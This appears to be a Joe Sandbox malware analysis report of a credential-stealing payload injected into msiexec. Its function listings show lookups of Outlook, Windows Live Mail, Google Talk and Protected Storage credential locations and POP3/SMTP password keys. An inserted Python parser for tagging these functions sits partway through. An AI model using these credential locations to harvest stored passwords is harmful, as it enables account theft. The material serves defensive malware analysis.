                                                                            • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                            • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0044430B
                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                            • memset.MSVCRT ref: 00444379
                                                                            • memset.MSVCRT ref: 00444394
                                                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                            • strlen.MSVCRT ref: 004443DB
                                                                            • _strcmpi.MSVCRT ref: 00444401
                                                                            Strings
                                                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                            • Store Root, xrefs: 004443A5
                                                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                            • API String ID: 3203569119-2578778931
                                                                            • Opcode ID: a5a3b5de69c01cde89edf01c6ca21efea8d82838e5b9820ad63090ec74a4c9c8
                                                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                            • Opcode Fuzzy Hash: a5a3b5de69c01cde89edf01c6ca21efea8d82838e5b9820ad63090ec74a4c9c8
                                                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
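
The listings above are the part of this report an analyst reads to see which mail credential stores the payload injected into msiexec reaches: the `*.oeaccount` enumeration (FindFirstFileA at 00407F0E), the Thunderbird and Eudora registry lookups, the `pstorec.dll` / `PStoreCreateInstance` routine that also walks the Outlook profile keys (00403C35), and the Windows Live Mail `Store Root` routine. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses these listing blocks as rendered on this page (the APIs, Strings and Similarity sections) into records and tags each function with the credential stores named in its API arguments and strings. The indicator substrings are taken only from lines shown in this section; the store labels, the constructed two-listing sample input, and the rule that a function's anchor is its lowest non-subcall ref address are assumptions made for the example.

```python
# Added example (not from the report or the sample): parse Joe Sandbox IDA Plugin
# function listings and tag each function with the mail credential stores it names.
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: two listings copied from this section (process 11, msiexec).
SAMPLE_REPORT = r"""
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
• FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
• strlen.MSVCRT ref: 00407F5C
Strings
Similarity
• String ID: ACD

APIs
• Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
• _mbscpy.MSVCRT(?,?), ref: 00403E54
Strings
• Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
• www.google.com/Please log in to your Gmail account, xrefs: 00403C9A
• pstorec.dll, xrefs: 00403C30
Similarity
• String ID: PStoreCreateInstance$Software\Microsoft\Office\16.0\Outlook\Profiles$pstorec.dll
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
                    r"(?P<name>[^.(\s]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^(?P<value>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")

# Indicators are strings and API arguments shown in this section; the store labels are assumed.
CREDENTIAL_STORES = {
    "Outlook/MAPI profiles": ("Outlook\\Profiles", "Windows Messaging Subsystem\\Profiles",
                              "OMI Account Manager", "Internet Account Manager"),
    "Windows Mail/Live Mail": (".oeaccount", "Windows Live Mail", "Windows Mail", "Store Root"),
    "Thunderbird/Eudora": ("Mozilla Thunderbird", "Thunderbird\\Profiles", "Eudora", "nss3.dll"),
    "Protected Storage (pstorec)": ("pstorec.dll", "PStoreCreateInstance"),
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: int
    subcall_of: Optional[int] = None  # set when the line reads "Part of subcall function X"


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (value, xref address)
    similarity: dict = field(default_factory=dict)

    def anchor(self) -> Optional[int]:
        """Lowest direct (non-subcall) ref address, assumed here as the function's locator."""
        refs = [a.ref for a in self.apis if a.subcall_of is None]
        return min(refs) if refs else None

    def credential_stores(self) -> list:
        """Stores named in API arguments, the Strings section, or the '$'-joined String ID list."""
        haystack = [a.args for a in self.apis] + [s for s, _ in self.strings]
        haystack += self.similarity.get("String ID", "").split("$")
        text = "\n".join(haystack).lower()
        return [store for store, needles in CREDENTIAL_STORES.items()
                if any(n.lower() in text for n in needles)]


def parse_report(text: str) -> list:
    """Split page text into one FunctionRecord per 'APIs' listing; non-bullet lines are ignored."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every function listing starts with its APIs section
            current = FunctionRecord()
            records.append(current)
            section = "APIs"
        elif line in SECTION_HEADERS:
            section = line
        elif line == "Control-flow Graph":  # graph heading and legend belong to no section
            section = None
        elif current is not None and line.startswith("•"):
            item = line[1:].strip()
            if section == "APIs" and (m := API_RE.match(item)):
                sub = m.group("sub")
                current.apis.append(ApiCall(m.group("name"), m.group("module"), m.group("args") or "",
                                            int(m.group("ref"), 16), int(sub, 16) if sub else None))
            elif section == "Strings" and (m := STRING_RE.match(item)):
                current.strings.append((m.group("value"), int(m.group("ref"), 16)))
            elif section == "Similarity":
                key, _, value = item.partition(":")
                current.similarity[key.strip()] = value.strip()
    return records


def summarize(text: str) -> list:
    """One row per function: anchor address, direct API names, and credential stores reached."""
    return [{"anchor": rec.anchor(),
             "apis": [a.name for a in rec.apis if a.subcall_of is None],
             "stores": rec.credential_stores()} for rec in parse_report(text)]


if __name__ == "__main__":
    for row in summarize(SAMPLE_REPORT):
        addr = f"{row['anchor']:08X}" if row["anchor"] is not None else "????????"
        print(f"{addr}  {', '.join(row['apis'])}  ->  {row['stores'] or 'no credential store'}")
```

Run it on the full report text and the rows with a non-empty `stores` list are the functions to read first; a function whose direct APIs are only CRT string routines but whose `String ID` list names a profile key (as the Thunderbird listing does) is still caught, because the classifier looks at the Similarity strings as well as the call arguments.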

                                                                            Control-flow Graph

                                                                            control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                            • String ID:
                                                                            • API String ID: 2054149589-0
                                                                            • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                            • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                            Control-flow Graph

                                                                            control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor_mbsicmpqsort
                                                                            • String ID: /nosort$/sort
                                                                            • API String ID: 882979914-1578091866
                                                                            • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                            • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 004109F7
                                                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                              • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                            • memset.MSVCRT ref: 00410A32
                                                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                            • String ID:
                                                                            • API String ID: 3143880245-0
                                                                            • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                            • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                            Control-flow Graph

                                                                            control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                            • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                            Control-flow Graph

                                                                            control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 378 410ddf-410de2 370->378 379 410dee-410df1 370->379 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 376 410e45-410e4f call 410a9c 372->376 373->372 375 410e22-410e25 373->375 375->372 380 410e37-410e40 375->380 386 410e51-410e76 call 410d3d call 410add 376->386 387 410e7f-410e92 _mbscpy 376->387 378->371 382 410de4-410de7 378->382 385 410df8 379->385 380->376 382->371 384 410de9-410dec 382->384 384->371 384->379 388 410e95-410e97 385->388 386->387 387->388
                                                                            APIs
                                                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                            • memset.MSVCRT ref: 00410E10
                                                                            • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                            • API String ID: 119022999-2036018995
                                                                            • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                            • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                            Control-flow Graph

                                                                            control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                            APIs
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                            • memset.MSVCRT ref: 00408620
                                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                            • memset.MSVCRT ref: 00408671
                                                                            Strings
                                                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                            • String ID: Software\Google\Google Talk\Accounts
                                                                            • API String ID: 3996936265-1079885057
                                                                            • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                            • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                            Control-flow Graph

                                                                            control_flow_graph 416 40ce70-40cea1 call 4023b2 call 401e69 421 40cea3-40cea6 416->421 422 40ceb8 416->422 423 40ceb2 421->423 424 40cea8-40ceb0 421->424 425 40cebd-40cecc _strcmpi 422->425 428 40ceb4-40ceb6 423->428 424->428 426 40ced3-40cedc call 40cdda 425->426 427 40cece-40ced1 425->427 429 40cede-40cef7 call 40c3d0 call 40ba28 426->429 433 40cf3f-40cf43 426->433 427->429 428->425 437 40cef9-40cefd 429->437 438 40cf0e 429->438 439 40cf0a-40cf0c 437->439 440 40ceff-40cf08 437->440 441 40cf13-40cf30 call 40affa 438->441 439->441 440->441 443 40cf35-40cf3a call 40c580 441->443 443->433
                                                                            APIs
                                                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$_strcmpimemset
                                                                            • String ID: /stext
                                                                            • API String ID: 520177685-3817206916
                                                                            • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                            • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9

                                                                            Control-flow Graph

                                                                            control_flow_graph 445 404734-40474a call 404785 LoadLibraryA 448 40474c-404762 GetProcAddress 445->448 449 40476e-404778 445->449 448->449 450 404764 448->450 451 404781-404784 449->451 452 40477a-40477c call 404785 449->452 450->449 452->451
                                                                            APIs
                                                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID:
                                                                            • API String ID: 145871493-0
                                                                            • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                            • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                            APIs
                                                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                                                            • String ID:
                                                                            • API String ID: 4165544737-0
                                                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                            APIs
                                                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                            APIs
                                                                            • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString_mbscmpstrlen
                                                                            • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                            • API String ID: 3963849919-1658304561
                                                                            • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                            • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                            • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                            • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                            APIs
                                                                              • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                              • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                              • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
